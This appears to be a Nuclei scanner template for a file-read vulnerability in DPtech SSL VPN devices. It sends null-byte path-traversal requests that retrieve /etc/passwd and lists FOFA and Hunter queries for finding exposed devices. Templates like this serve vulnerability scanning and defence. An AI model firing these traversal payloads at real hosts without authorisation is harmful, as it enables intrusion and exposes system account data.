id: dptech-sslvpn-fileread
info:
  name: 迪普 VPN - 文件读取漏洞
  author: leadlife
  severity: high
  description: 杭州迪普科技股份有限公司（简称“迪普科技”） 以“让网络更简单、智能、安全”为使命，聚焦于网络安全及应用交付领域，是一家集研发、生产、销售于一体的高科技上市企业迪普VPN存在文件读取漏洞,攻击者可利用该漏洞获取系统的敏感信息等
  reference:
    - todo
  metadata:
    verified: true
    max-request: 1
    fofa-qeury: app="DPtech-SSLVPN"
    hunter-query: app.name="DPtech-SSLVPN"
  tags: dptech,fileread

http:
  - method: GET
    path:
      - "{{BaseURL}}/%00/../../../../../../etc/passwd"
      - "{{BaseURL}}/.%00.%2F.%00.%2F.%00.%2F.%00.%2F.%00.%2F.%00.%2F.%00.%2Fetc%2Fpasswd"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
          - "\\[(font|extension|file)s\\]"
        condition: or

      - type: status
        status:
          - 200
